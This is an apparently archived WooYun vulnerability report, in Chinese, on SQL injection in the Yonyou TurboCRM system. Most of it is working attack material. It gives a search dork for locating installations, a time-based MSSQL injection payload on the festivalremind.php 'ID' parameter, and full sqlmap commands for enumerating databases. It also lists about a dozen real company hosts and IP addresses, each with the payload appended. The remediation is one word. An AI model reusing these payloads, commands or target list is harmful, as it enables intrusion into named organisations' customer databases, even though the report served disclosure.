当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082631

漏洞标题:用友TruboCRM管理系统SQL注入

相关厂商:国家互联网应急中心

漏洞作者: error

提交时间:2014-11-09 14:53

修复时间:2015-02-07 14:54

公开时间:2015-02-07 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-09: 细节已通知厂商并且等待厂商处理中
2014-11-13: 厂商已经确认,细节仅向厂商公开
2014-11-16: 细节向第三方安全合作伙伴开放
2015-01-07: 细节向核心白帽子及相关领域专家公开
2015-01-17: 细节向普通白帽子公开
2015-01-27: 细节向实习白帽子公开
2015-02-07: 细节向公众公开

简要描述:

RT

详细说明:

用友CRM客户关系管理系统
Google关键字:intitle:用友TurboCRM intext:登录

0.PNG

注入链接:/background/festivalremind.php?ID=1
注入参数:ID
Payload: ?ID=1; WAITFOR DELAY '0:0:5'--
Sqlmap注入命令: sqlmap -u 'http://xxxxxx/background/festivalremind.php?ID=1' --level 5 --risk 3 --thechnique=T --dbms mssql --dbs --random-agent --batch -v 3

漏洞证明:

测试案例:
(1) http://crm.szclou.com:8088/background/festivalremind.php?ID=1
python sqlmap.py -u http://crm.szclou.com:8088/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 1 --random-agent --technique=T

1.png


(2)http://www.kdlian.com:8001/background/festivalremind.php?ID=1
python sqlmap.py -u http://www.kdlian.com:8001/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T

2.png


(3)http://218.94.82.23/background/festivalremind.php?ID=1
python sqlmap.py -u http://218.94.82.23/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T

3.png


(4)http://220.113.5.194/background/festivalremind.php?ID=1
python sqlmap.py -u http://220.113.5.194/background/festivalremind.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T

4.png


其他案例:
http://218.84.134.162:8088/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://crm.pearmain.cn/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://nc.shineroad.com/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://crm7.abgroup.cn/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://crm.transn.net/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://218.108.86.226/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://crm.yiwenkeji.com:8080/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--
http://yindajituan.gicp.net:8888/background/festivalremind.php?ID=1;waitfor%20delay%20'0:0:5'--

修复方案:

过滤

版权声明:转载请注明来源 error@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-13 13:40

厂商回复:

最新状态:

暂无